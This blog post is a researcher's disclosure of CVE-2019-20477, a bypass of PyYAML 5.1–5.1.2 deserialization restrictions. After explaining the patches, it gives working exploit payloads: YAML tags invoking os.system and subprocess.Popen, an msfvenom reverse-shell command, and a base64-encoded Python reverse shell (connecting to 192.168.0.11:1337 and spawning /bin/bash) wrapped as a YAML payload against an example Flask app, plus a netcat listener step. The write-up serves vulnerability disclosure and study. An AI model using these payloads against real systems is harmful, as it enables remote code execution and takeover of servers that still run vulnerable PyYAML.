[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2

Overview of YAML

According to the definition in Wikipedia, YAML (Yet Another Markup Language) is a human-readable data serialization language, it is commonly used for configuration files and in applications where data is being stored or transmitted. It uses both Python-style indentations to indicate nesting, and a more compact format that uses [] for lists and {} for maps making YAML a superset of JSON.

Example:

Un-Serialized Data:

{'a':'hello','b':'world','c':['this', 'is',' yaml']}

YAML Serialized Data:


a: hello
b: world
c:
- this
- is
- ' yaml'

YAML is used in various applications irrespective of their platform weather it is a web application, thick client application, mobile application etc. One can go to https://yaml.org/ to know more about YAML project.

Vulnerability Background

YAML is vulnerable because it has the capability to serialize custom objects of classes and class methods. PyYAML was already known to be vulnerable to Deserialization until maintainer of this module released version 5.1, where he implemented some restrictions and was very much assured that they could stop this deserialization attack.

These restrictions can be easily bypassed under certain conditions which in most of the time can be expected to be met. This was found by me last year when I was creating a challenge for CTF.

PyYAML <5.1

In PyYAML version < 5.1 there is no restriction and one could easily perform deserialization attack by creating a payload, originally, one can form a custom object of class method os.system() and execute code when it will get deserialize, as shown below,

Payload creation:

import yaml
import os


class Payload(object):
    def __reduce__(self):
        return (os.system,('ls',))


serialized_data = yaml.dump(Payload())  # serializing data

print(serialized_data)

The Payload will look like this;

!!python/object/apply:nt.system [ls]

This payload can be deserialized using load() method of pyyaml, by default load() method is using unsafe deserialization loader if “Loader” not specified as a parameter. So the code that can deserialize this can be written as:

import yaml

data = b"""!!python/object/apply:nt.system [ls]"""
deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

This will reform the object of os.system() with the parameter “ls” that will lead to the execution of code. And we get directory list:

test.py
abc.txt
test.txt

PyYAML >=5.1 <=5.1.2

In version 5.1 , maintainer put two restrictions to stop RCE.

Let us deserialize a serialized python built-in module method object, with default load() in version 5.1.2

import yaml
data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

Output:

C:/Users/j0lt/paper_files/main.py:4: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.
deserialized_data = yaml.load(data)  # serializing data
Traceback (most recent call last):
File "C:/Users/j0lt/paper_files/main.py", line 4, in 
deserialized_data = yaml.load(data)  # serializing data
File "C:\Users\j0lt\venv\lib\site-packages\yaml\__init__.py", line 114, in load
return loader.get_single_data()
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 43, in get_single_data
return self.construct_document(node)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 94, in construct_object
data = constructor(self, tag_suffix, node)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 624, in construct_python_object_apply
instance = self.make_python_instance(suffix, node, args, kwds, newobj)
File "C:\Users\j0lt\venv\lib\site-packages\yaml\constructor.py", line 570, in make_python_instance
node.start_mark)
yaml.constructor.ConstructorError: while constructing a Python instance
expected a class, but found <class 'builtin_function_or_method'>
in "", line 1, column 1:
!!python/object/apply:time.sleep ...
^

It failed. Because in version 5.1.2, it doesn’t allow to deserialize any serialized python class or class attribute, with Loader not specified in load() or Loader=SafeLoader. Only class type objects are allowed to deserialize which are present in the script or imported in the script.

The question arises, why it is happening in these conditions. For that, the changes made to constructor.py of PyYAML are responsible. There are two patches in version 5.1 that restrict deserialization of built-in class methods and use of those classes which are not imported or present in the deserialization code.

Code of constructor.py of PyYAML version >=5.1:

Patch 1:

Patch 2:

The code can stop its execution because of any of the above highlighted conditions to be True.

In Patch 1, sys.modules list down all the modules getting used in the code. Let us check if the “time” module is in code or not?

import yaml
import sys

print(sys.modules['time'])

output:

<module 'time' (built-in)>

The output shows that the “time” module is present in the code. The question arises, how? It is because YAML modules have some classes like constructor.py etc. which uses datetime module and it is very clear from datetime module that datetime uses “time” module.

Code of datetime module:

Since, “time” module is a part of the code, sys.modules lists “time”, this condition becomes False and code moves forward.

It is evidentiary, the maintainer of this module wanted to allow deserialization of used classes or modules in the deserializing code only. Hence, it is not a proper patch.

Other cases in which it will make this highlighted condition to be false and deserialize data are:

1. That class or module is explicitly imported in the deserializing code.

Example:

import yaml

import time
data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

2. Any module is imported in deserializing code which is using that specified class/module in its code. For Example, PyYAML’s constructor.py is having datetime imported and datetime have time imported so time is present in sys .modules.
Example:

import yaml

data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

3. Deserializing code has a custom class and required class methods as its class method.

import yaml

class time:
def sleep(self, t):
    print("Sleeping "+t+" seconds")

data = b'!!python/object/apply:time.sleep [10]'

deserialized_data = yaml.load(data)  # deserializing data

print(deserialized_data)

This will not give 10-second delay but prints “Sleeping 10 seconds” in the console.

For all the above conditions, the first patch can be bypassed and code jumps to the next steps.

Secondly, the code will check if “sleep” is an attribute of module “time” using hasattr().

If the object_name is the attribute of the module then it will make condition false and code will jump to return statement on line 544. Now, getattr(module, object_name) try to create an object of attribute object_name of module and represent it like below,

Code:

import yaml
import sys

print(getattr(sys.modules['time'], 'sleep'))

Output:

 

The output shows that the type of attribute “sleep” in the “time” module. It clearly shows that “sleep” exist as an individual function in the time module and not as a class or class method.

Coming to Patch 2, it will check, what type of attribute the deserialized data is calling in the specified module or class using isinstance(cls, type). If it is not of type class then it will make condition true and stops execution with an error, like in case of “time.sleep”. “sleep” gives “built-in function” type and not the class type which takes this condition as false.

Code:

import yaml
import sys

cls = getattr(sys.modules['time'], 'sleep')
print(isinstance(cls, type))

Output:

False

We can bypass it by deserializing objects of classes only and not class methods or any other type of attributes of module. In short, we needed “sleep” to be a class instead of a function to make it executed.

Trying same code in Pyyaml version < 5.1, load(data, Loader=Loader), load(data, Loader=FullLoader) or load(data, Loader=UnsafeLoader), we will get output with delay of 10 seconds which completely show that “time.sleep(10)” will get executed. The “None” is the return value of “time.sleep(10)” after execution .

Output;

None

For the PyYAML version < 5.1, the constructor.py don’t have these patches and works fine.

Now we have all the scenarios that we need to create our payload. os.system() cannot be used to create payload because os.system will run and execute commands in PyYAML version < 5.1 but in version >=5.1 it will not work because of patch 2, as system is not a class in the os module. So instead of this, we will use subprocess.Popen(), Popen is a class in subprocess module and it bypasses patch 2. So this condition is a bypass to patches applied for CVE-2017-18342.

Example Scenario

Let consider a web application running on the flask and which is using yaml.load() object to deserialize user-supplied input. Used python environment is python2.x.
Code:



 

The application is running at port 8080.

In browser, it will show page at http://:8080/

Now let’s try a payload to get a reverse shell through RCE at port 1337 of attacker machine.
We will use msfvenom and basic yaml syntax for generating a payload for a reverse shell.

First, we need to use generate a python payload which can give us a reverse shell when executed. For that use msfvenom,

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw

It will give output like,

"exec('aW1wb3J0IHNvY2tldCAgICAsICBzdWJwcm9jZXNzICAgICwgIG9zICAgICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjAuMTEiICAgICAgIDsgICAgICAgICBwb3J0PTEzMzcgICAgICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAsICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgcG9ydCkpICAgICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgMCkgICAgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAxKSAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgIDIpICAgICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

So, our payload will look like this:

!!python/object/apply:subprocess.Popen
- !!python/tuple
- python
- -c
- "exec('aW1wb3J0IHNvY2tldCAgICAsICBzdWJwcm9jZXNzICAgICwgIG9zICAgICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjAuMTEiICAgICAgIDsgICAgICAgICBwb3J0PTEzMzcgICAgICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAsICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgcG9ydCkpICAgICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgMCkgICAgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAxKSAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgIDIpICAgICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

Kindly note that we are not using dump() for generating this payload because of use of single and double quotes in our payload. Either we can make it manually like this or one can use peas available on Github(https://github.com/j0lt-github/python-deserialization-attack-payload-generator).

Now, this payload in base64 is,

ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gcHl0aG9uCiAgLSAtYwogIC0gImV4ZWMoJ2FXMXdiM0owSUhOdlkydGxkQ0FnSUNBc0lDQnpkV0p3Y205alpYTnpJQ0FnSUN3Z0lHOXpJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQm9iM04wUFNJeE9USXVNVFk0TGpBdU1URWlJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQndiM0owUFRFek16Y2dJQ0FnSUNBZ095QWdJQ0FnSUNBZ0lITTljMjlqYTJWMExuTnZZMnRsZENoemIyTnJaWFF1UVVaZlNVNUZWQ0FnSUNBc0lDQnpiMk5yWlhRdVUwOURTMTlUVkZKRlFVMHBJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQnpMbU52Ym01bFkzUW9LR2h2YzNRZ0lDQWdMQ0FnY0c5eWRDa3BJQ0FnSUNBZ0lEc2dJQ0FnSUNBZ0lDQnZjeTVrZFhBeUtITXVabWxzWlc1dktDa2dJQ0FnTENBZ01Da2dJQ0FnSUNBZ095QWdJQ0FnSUNBZ0lHOXpMbVIxY0RJb2N5NW1hV3hsYm04b0tTQWdJQ0FzSUNBeEtTQWdJQ0FnSUNBN0lDQWdJQ0FnSUNBZ2IzTXVaSFZ3TWloekxtWnBiR1Z1YnlncElDQWdJQ3dnSURJcElDQWdJQ0FnSURzZ0lDQWdJQ0FnSUNCd1BYTjFZbkJ5YjJObGMzTXVZMkZzYkNnaUwySnBiaTlpWVhOb0lpaz0nLmRlY29kZSgnYmFzZTY0JykpIg==

Open port for incoming shell connection using netcat.

Now try to submit this payload.

It will show an “Internal Server Error” on the browser.

But we will get a reverse connection in netcat.

And finally, we are able to bypass all restrictions and prooved that the applied patches can be bypassed. And I registered a CVE for this (CVE-2019-20477).

Although the maintainer had released a stable and correctly patched version after a month of my disclosure. The current version of Pyyaml,  5.3.x is safe. Although few of the applications could be using an old version of pyyaml and still be vulnerable to attacks.

For more information, refer to my research paper on exploit db .

Sources good to read

Leave a Comment

Your email address will not be published. Required fields are marked *

SiteLock